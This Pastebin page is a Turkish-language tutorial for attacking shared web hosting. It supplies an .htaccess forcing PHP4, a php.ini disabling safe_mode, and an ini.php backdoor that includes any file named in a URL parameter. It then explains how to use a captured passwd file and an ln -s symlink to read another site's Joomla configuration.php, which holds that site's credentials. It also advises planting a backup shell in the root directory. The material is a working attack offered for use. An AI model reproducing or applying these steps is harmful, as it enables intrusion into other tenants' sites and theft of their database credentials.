Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- .htaccess
- Kod:
- <Files *.php>
- ForceType application/x-httpd-php4
- </Files>
- ----------------------------------------------------
- php.ini
- Kod:
- safe_mode = OFF
- ----------------------------------------------------
- ini.php
- Kod:
- <?
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GET["file"]);
- ini_restore("safe_mode");
- ini_restore("open_basedir");
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- include($_GET["ss"]);
- ?>
- -------------------------------------
- Bu Dosyaları serverde açtığımız dizine upload ediyoruz örneğin ben Pose diye bir dizin açtım
- oraya yükledim farzedelim yapmamız gerekn şu çektiğimiz pwd dosyasından geçmek istediğimiz dizini bulmak örneğin
- /home/poseidon/public_html/ dizininde olduğumuzu farz edeli fakat elimzdeki pwd dosyasında şöyle bir başka dizin bulunmakta
- /home/bk:/usr/local/cpanel/bin/noshell
- /home/bk2:/usr/local/cpanel/bin/noshell
- /home/bk3:/usr/local/cpanel/bin/noshell
- /home/bk4:/usr/local/cpanel/bin/noshell
- /home/bk5:/usr/local/cpanel/bin/noshell
- /home/bk6:/usr/local/cpanel/bin/noshell
- hepsini farklı olarak düşünü bizim yapmamız gereken geçmek istediğimiz dizini yazmak örneğin ben bu dizinden
- /home/bk/public_html/
- bir başka dizin olan /home/bk:/usr/local/cpanel/bin/noshell dizinine geçmek istiyorum ve oradaki configi alıp yazdırmak istiyorum dikkat etmemiz gerekn husus sistemdir joomlamı wordpressmi
- eğer joomla ise
- ln -s //home/bk/public_html/configration.php pose.shtml
- diyip enterliyoruz eğer configi çekerse ana dizinde şöyle bir sayfa oluşturacak pose.shtml diye tıkladığımızda config bilgisini karşımızda veya source kısmında olduğunu göreceğiz bunu ctrl+u yaparak görebiliriz
- NOT:Sunucu php4'e düşürülürken shell'i kaybedebilirsiniz bu yüzden her ihtimale karşı anadizine bir shell upload edin sıkıntı olmasın
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement